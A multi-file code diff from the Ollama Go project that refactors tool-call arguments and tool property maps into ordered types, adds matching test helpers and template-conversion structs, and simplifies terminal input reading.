@ -257,10 +257,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
||||||
// Parameters: api.ToolFunctionParameters{
|
// Parameters: api.ToolFunctionParameters{
|
||||||
// Type: "object",
|
// Type: "object",
|
||||||
// Required: []string{"a", "b"},
|
// Required: []string{"a", "b"},
|
||||||
// Properties: map[string]api.ToolProperty{
|
// Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
// "a": {Type: api.PropertyType{"integer"}, Description: "First number"},
|
// "a": {Type: api.PropertyType{"integer"}, Description: "First number"},
|
||||||
// "b": {Type: api.PropertyType{"integer"}, Description: "Second number"},
|
// "b": {Type: api.PropertyType{"integer"}, Description: "Second number"},
|
||||||
// },
|
// }),
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
|
|
@ -272,10 +272,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
||||||
// Parameters: api.ToolFunctionParameters{
|
// Parameters: api.ToolFunctionParameters{
|
||||||
// Type: "object",
|
// Type: "object",
|
||||||
// Required: []string{"x", "y"},
|
// Required: []string{"x", "y"},
|
||||||
// Properties: map[string]api.ToolProperty{
|
// Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
// "x": {Type: api.PropertyType{"integer"}, Description: "First factor"},
|
// "x": {Type: api.PropertyType{"integer"}, Description: "First factor"},
|
||||||
// "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"},
|
// "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"},
|
||||||
// },
|
// }),
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
// },
|
// },
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,51 @@
|
||||||
|
package renderers
|
||||||
|
|
||||||
|
import "github.com/ollama/ollama/api"
|
||||||
|
|
||||||
|
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||||
|
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
for k, v := range m {
|
||||||
|
props.Set(k, v)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
||||||
|
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||||
|
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for k, v := range m {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
||||||
|
// orderedArg represents a key-value pair for ordered argument creation
|
||||||
|
type orderedArg struct {
|
||||||
|
Key string
|
||||||
|
Value any
|
||||||
|
}
|
||||||
|
|
||||||
|
// testArgsOrdered creates ToolCallFunctionArguments with a specific key order
|
||||||
|
func testArgsOrdered(pairs []orderedArg) api.ToolCallFunctionArguments {
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for _, p := range pairs {
|
||||||
|
args.Set(p.Key, p.Value)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
||||||
|
// orderedProp represents a key-value pair for ordered property creation
|
||||||
|
type orderedProp struct {
|
||||||
|
Key string
|
||||||
|
Value api.ToolProperty
|
||||||
|
}
|
||||||
|
|
||||||
|
// testPropsOrdered creates a ToolPropertiesMap with a specific key order
|
||||||
|
func testPropsOrdered(pairs []orderedProp) *api.ToolPropertiesMap {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
for _, p := range pairs {
|
||||||
|
props.Set(p.Key, p.Value)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
@ -10,6 +10,20 @@ import (
|
||||||
"github.com/ollama/ollama/api"
|
"github.com/ollama/ollama/api"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
|
||||||
|
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for k, v := range m {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
||||||
|
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
|
||||||
|
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||||
|
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||||
|
})
|
||||||
|
|
||||||
const (
|
const (
|
||||||
prefix = `data:image/jpeg;base64,`
|
prefix = `data:image/jpeg;base64,`
|
||||||
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
|
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
|
||||||
|
|
@ -159,9 +173,9 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 2,
|
Index: 2,
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Seattle",
|
"location": "Seattle",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
|
@ -169,9 +183,9 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 7,
|
Index: 7,
|
||||||
Name: "get_time",
|
Name: "get_time",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"timezone": "UTC",
|
"timezone": "UTC",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
@ -215,7 +229,7 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
|
||||||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
|
|
||||||
if diff := cmp.Diff(original, toolCalls); diff != "" {
|
if diff := cmp.Diff(original, toolCalls, argsComparer); diff != "" {
|
||||||
t.Errorf("input tool calls mutated (-want +got):\n%s", diff)
|
t.Errorf("input tool calls mutated (-want +got):\n%s", diff)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -925,7 +925,7 @@ func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
|
||||||
ID: "call_abc",
|
ID: "call_abc",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -1800,7 +1800,7 @@ func TestResponsesStreamConverter_FunctionCallStatus(t *testing.T) {
|
||||||
ID: "call_abc",
|
ID: "call_abc",
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -30,7 +30,7 @@ func (p *Prompt) placeholder() string {
|
||||||
}
|
}
|
||||||
|
|
||||||
type Terminal struct {
|
type Terminal struct {
|
||||||
outchan chan rune
|
reader *bufio.Reader
|
||||||
rawmode bool
|
rawmode bool
|
||||||
termios any
|
termios any
|
||||||
}
|
}
|
||||||
|
|
@ -264,36 +264,21 @@ func NewTerminal() (*Terminal, error) {
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
|
if err := UnsetRawMode(fd, termios); err != nil {
|
||||||
t := &Terminal{
|
return nil, err
|
||||||
outchan: make(chan rune),
|
|
||||||
rawmode: true,
|
|
||||||
termios: termios,
|
|
||||||
}
|
}
|
||||||
|
|
||||||
go t.ioloop()
|
t := &Terminal{
|
||||||
|
reader: bufio.NewReader(os.Stdin),
|
||||||
|
}
|
||||||
|
|
||||||
return t, nil
|
return t, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (t *Terminal) ioloop() {
|
|
||||||
buf := bufio.NewReader(os.Stdin)
|
|
||||||
|
|
||||||
for {
|
|
||||||
r, _, err := buf.ReadRune()
|
|
||||||
if err != nil {
|
|
||||||
close(t.outchan)
|
|
||||||
break
|
|
||||||
}
|
|
||||||
t.outchan <- r
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func (t *Terminal) Read() (rune, error) {
|
func (t *Terminal) Read() (rune, error) {
|
||||||
r, ok := <-t.outchan
|
r, _, err := t.reader.ReadRune()
|
||||||
if !ok {
|
if err != nil {
|
||||||
return 0, io.EOF
|
return 0, err
|
||||||
}
|
}
|
||||||
|
|
||||||
return r, nil
|
return r, nil
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -22,6 +22,29 @@ import (
|
||||||
"github.com/ollama/ollama/ml"
|
"github.com/ollama/ollama/ml"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
|
||||||
|
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
for k, v := range m {
|
||||||
|
props.Set(k, v)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
||||||
|
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
|
||||||
|
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for k, v := range m {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
||||||
|
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
|
||||||
|
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||||
|
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||||
|
})
|
||||||
|
|
||||||
type mockRunner struct {
|
type mockRunner struct {
|
||||||
llm.LlamaServer
|
llm.LlamaServer
|
||||||
|
|
||||||
|
|
@ -488,7 +511,7 @@ func TestGenerateChat(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The city and state",
|
Description: "The city and state",
|
||||||
|
|
@ -497,7 +520,7 @@ func TestGenerateChat(t *testing.T) {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Enum: []any{"celsius", "fahrenheit"},
|
Enum: []any{"celsius", "fahrenheit"},
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -559,15 +582,15 @@ func TestGenerateChat(t *testing.T) {
|
||||||
expectedToolCall := api.ToolCall{
|
expectedToolCall := api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Seattle, WA",
|
"location": "Seattle, WA",
|
||||||
"unit": "celsius",
|
"unit": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
expectedToolCall.ID = gotToolCall.ID
|
expectedToolCall.ID = gotToolCall.ID
|
||||||
if diff := cmp.Diff(gotToolCall, expectedToolCall); diff != "" {
|
if diff := cmp.Diff(gotToolCall, expectedToolCall, argsComparer); diff != "" {
|
||||||
t.Errorf("tool call mismatch (-got +want):\n%s", diff)
|
t.Errorf("tool call mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -582,7 +605,7 @@ func TestGenerateChat(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The city and state",
|
Description: "The city and state",
|
||||||
|
|
@ -591,7 +614,7 @@ func TestGenerateChat(t *testing.T) {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Enum: []any{"celsius", "fahrenheit"},
|
Enum: []any{"celsius", "fahrenheit"},
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -688,10 +711,10 @@ func TestGenerateChat(t *testing.T) {
|
||||||
expectedToolCall := api.ToolCall{
|
expectedToolCall := api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Seattle, WA",
|
"location": "Seattle, WA",
|
||||||
"unit": "celsius",
|
"unit": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -703,7 +726,7 @@ func TestGenerateChat(t *testing.T) {
|
||||||
}
|
}
|
||||||
|
|
||||||
expectedToolCall.ID = finalToolCall.ID
|
expectedToolCall.ID = finalToolCall.ID
|
||||||
if diff := cmp.Diff(finalToolCall, expectedToolCall); diff != "" {
|
if diff := cmp.Diff(finalToolCall, expectedToolCall, argsComparer); diff != "" {
|
||||||
t.Errorf("final tool call mismatch (-got +want):\n%s", diff)
|
t.Errorf("final tool call mismatch (-got +want):\n%s", diff)
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
@ -716,9 +739,9 @@ func TestGenerateChat(t *testing.T) {
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {Type: api.PropertyType{"string"}},
|
"location": {Type: api.PropertyType{"string"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -29,12 +29,12 @@ func getTestTools() []api.Tool {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The city and state, e.g. San Francisco, CA",
|
Description: "The city and state, e.g. San Francisco, CA",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -46,12 +46,12 @@ func getTestTools() []api.Tool {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"expression"},
|
Required: []string{"expression"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"expression": {
|
"expression": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The mathematical expression to calculate",
|
Description: "The mathematical expression to calculate",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -185,9 +185,9 @@ func TestChatHarmonyParserStreamingRealtime(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "San Francisco",
|
"location": "San Francisco",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -211,9 +211,9 @@ func TestChatHarmonyParserStreamingRealtime(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "calculate",
|
Name: "calculate",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"expression": "2+2",
|
"expression": "2+2",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -272,8 +272,8 @@ func (t *Template) Execute(w io.Writer, v Values) error {
|
||||||
} else if !v.forceLegacy && slices.Contains(vars, "messages") {
|
} else if !v.forceLegacy && slices.Contains(vars, "messages") {
|
||||||
return t.Template.Execute(w, map[string]any{
|
return t.Template.Execute(w, map[string]any{
|
||||||
"System": system,
|
"System": system,
|
||||||
"Messages": messages,
|
"Messages": convertMessagesForTemplate(messages),
|
||||||
"Tools": v.Tools,
|
"Tools": convertToolsForTemplate(v.Tools),
|
||||||
"Response": "",
|
"Response": "",
|
||||||
"Think": v.Think,
|
"Think": v.Think,
|
||||||
"ThinkLevel": v.ThinkLevel,
|
"ThinkLevel": v.ThinkLevel,
|
||||||
|
|
@ -373,6 +373,118 @@ func collate(msgs []api.Message) (string, []*api.Message) {
|
||||||
return strings.Join(system, "\n\n"), collated
|
return strings.Join(system, "\n\n"), collated
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// templateTools is a slice of templateTool that marshals to JSON.
|
||||||
|
type templateTools []templateTool
|
||||||
|
|
||||||
|
func (t templateTools) String() string {
|
||||||
|
bts, _ := json.Marshal(t)
|
||||||
|
return string(bts)
|
||||||
|
}
|
||||||
|
|
||||||
|
// templateTool is a template-compatible representation of api.Tool
|
||||||
|
// with Properties as a regular map for template ranging.
|
||||||
|
type templateTool struct {
|
||||||
|
Type string `json:"type"`
|
||||||
|
Items any `json:"items,omitempty"`
|
||||||
|
Function templateToolFunction `json:"function"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type templateToolFunction struct {
|
||||||
|
Name string `json:"name"`
|
||||||
|
Description string `json:"description"`
|
||||||
|
Parameters templateToolFunctionParameters `json:"parameters"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type templateToolFunctionParameters struct {
|
||||||
|
Type string `json:"type"`
|
||||||
|
Defs any `json:"$defs,omitempty"`
|
||||||
|
Items any `json:"items,omitempty"`
|
||||||
|
Required []string `json:"required,omitempty"`
|
||||||
|
Properties map[string]api.ToolProperty `json:"properties"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// templateToolCall is a template-compatible representation of api.ToolCall
|
||||||
|
// with Arguments as a regular map for template ranging.
|
||||||
|
type templateToolCall struct {
|
||||||
|
ID string
|
||||||
|
Function templateToolCallFunction
|
||||||
|
}
|
||||||
|
|
||||||
|
type templateToolCallFunction struct {
|
||||||
|
Index int
|
||||||
|
Name string
|
||||||
|
Arguments map[string]any
|
||||||
|
}
|
||||||
|
|
||||||
|
// templateMessage is a template-compatible representation of api.Message
|
||||||
|
// with ToolCalls converted for template use.
|
||||||
|
type templateMessage struct {
|
||||||
|
Role string
|
||||||
|
Content string
|
||||||
|
Thinking string
|
||||||
|
Images []api.ImageData
|
||||||
|
ToolCalls []templateToolCall
|
||||||
|
ToolName string
|
||||||
|
ToolCallID string
|
||||||
|
}
|
||||||
|
|
||||||
|
// convertToolsForTemplate converts Tools to template-compatible format.
|
||||||
|
func convertToolsForTemplate(tools api.Tools) templateTools {
|
||||||
|
if tools == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
result := make(templateTools, len(tools))
|
||||||
|
for i, tool := range tools {
|
||||||
|
result[i] = templateTool{
|
||||||
|
Type: tool.Type,
|
||||||
|
Items: tool.Items,
|
||||||
|
Function: templateToolFunction{
|
||||||
|
Name: tool.Function.Name,
|
||||||
|
Description: tool.Function.Description,
|
||||||
|
Parameters: templateToolFunctionParameters{
|
||||||
|
Type: tool.Function.Parameters.Type,
|
||||||
|
Defs: tool.Function.Parameters.Defs,
|
||||||
|
Items: tool.Function.Parameters.Items,
|
||||||
|
Required: tool.Function.Parameters.Required,
|
||||||
|
Properties: tool.Function.Parameters.Properties.ToMap(),
|
||||||
|
},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return result
|
||||||
|
}
|
||||||
|
|
||||||
|
// convertMessagesForTemplate converts Messages to template-compatible format.
|
||||||
|
func convertMessagesForTemplate(messages []*api.Message) []*templateMessage {
|
||||||
|
if messages == nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
result := make([]*templateMessage, len(messages))
|
||||||
|
for i, msg := range messages {
|
||||||
|
var toolCalls []templateToolCall
|
||||||
|
for _, tc := range msg.ToolCalls {
|
||||||
|
toolCalls = append(toolCalls, templateToolCall{
|
||||||
|
ID: tc.ID,
|
||||||
|
Function: templateToolCallFunction{
|
||||||
|
Index: tc.Function.Index,
|
||||||
|
Name: tc.Function.Name,
|
||||||
|
Arguments: tc.Function.Arguments.ToMap(),
|
||||||
|
},
|
||||||
|
})
|
||||||
|
}
|
||||||
|
result[i] = &templateMessage{
|
||||||
|
Role: msg.Role,
|
||||||
|
Content: msg.Content,
|
||||||
|
Thinking: msg.Thinking,
|
||||||
|
Images: msg.Images,
|
||||||
|
ToolCalls: toolCalls,
|
||||||
|
ToolName: msg.ToolName,
|
||||||
|
ToolCallID: msg.ToolCallID,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return result
|
||||||
|
}
|
||||||
|
|
||||||
// Identifiers walks the node tree returning any identifiers it finds along the way
|
// Identifiers walks the node tree returning any identifiers it finds along the way
|
||||||
func Identifiers(n parse.Node) ([]string, error) {
|
func Identifiers(n parse.Node) ([]string, error) {
|
||||||
switch n := n.(type) {
|
switch n := n.(type) {
|
||||||
|
|
|
||||||
|
|
@ -124,16 +124,21 @@ func (p *Parser) parseToolCall() *api.ToolCall {
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
var args map[string]any
|
var argsMap map[string]any
|
||||||
if found, i := findArguments(tool, p.buffer); found == nil {
|
if found, i := findArguments(tool, p.buffer); found == nil {
|
||||||
return nil
|
return nil
|
||||||
} else {
|
} else {
|
||||||
args = found
|
argsMap = found
|
||||||
if i > end {
|
if i > end {
|
||||||
end = i
|
end = i
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for k, v := range argsMap {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
|
||||||
tc := &api.ToolCall{
|
tc := &api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: tool.Function.Name,
|
Name: tool.Function.Name,
|
||||||
|
|
|
||||||
|
|
@ -9,6 +9,29 @@ import (
|
||||||
"github.com/ollama/ollama/api"
|
"github.com/ollama/ollama/api"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value (order-insensitive)
|
||||||
|
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||||
|
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||||
|
})
|
||||||
|
|
||||||
|
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||||
|
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
for k, v := range m {
|
||||||
|
props.Set(k, v)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
||||||
|
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||||
|
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for k, v := range m {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
||||||
func TestParser(t *testing.T) {
|
func TestParser(t *testing.T) {
|
||||||
qwen, err := template.New("qwen").Parse(`{{if .ToolCalls}}<tool_call>{{range .ToolCalls}}{"name": "{{.Function.Name}}", "arguments": {{.Function.Arguments}}}{{end}}</tool_call>{{end}}`)
|
qwen, err := template.New("qwen").Parse(`{{if .ToolCalls}}<tool_call>{{range .ToolCalls}}{"name": "{{.Function.Name}}", "arguments": {{.Function.Arguments}}}{{end}}</tool_call>{{end}}`)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
|
|
@ -44,7 +67,7 @@ func TestParser(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"city"},
|
Required: []string{"city"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"format": {
|
"format": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The format to return the temperature in",
|
Description: "The format to return the temperature in",
|
||||||
|
|
@ -54,7 +77,7 @@ func TestParser(t *testing.T) {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The city to get the temperature for",
|
Description: "The city to get the temperature for",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -65,12 +88,12 @@ func TestParser(t *testing.T) {
|
||||||
Description: "Retrieve the current weather conditions for a given location",
|
Description: "Retrieve the current weather conditions for a given location",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The location to get the weather conditions for",
|
Description: "The location to get the weather conditions for",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -95,12 +118,12 @@ func TestParser(t *testing.T) {
|
||||||
Description: "Get the address of a given location",
|
Description: "Get the address of a given location",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The location to get the address for",
|
Description: "The location to get the address for",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -111,7 +134,7 @@ func TestParser(t *testing.T) {
|
||||||
Description: "Add two numbers",
|
Description: "Add two numbers",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"a": {
|
"a": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The first number to add",
|
Description: "The first number to add",
|
||||||
|
|
@ -120,7 +143,7 @@ func TestParser(t *testing.T) {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "The second number to add",
|
Description: "The second number to add",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -157,9 +180,9 @@ func TestParser(t *testing.T) {
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Index: 0,
|
Index: 0,
|
||||||
Name: "get_conditions",
|
Name: "get_conditions",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "San Francisco",
|
"location": "San Francisco",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -174,7 +197,7 @@ func TestParser(t *testing.T) {
|
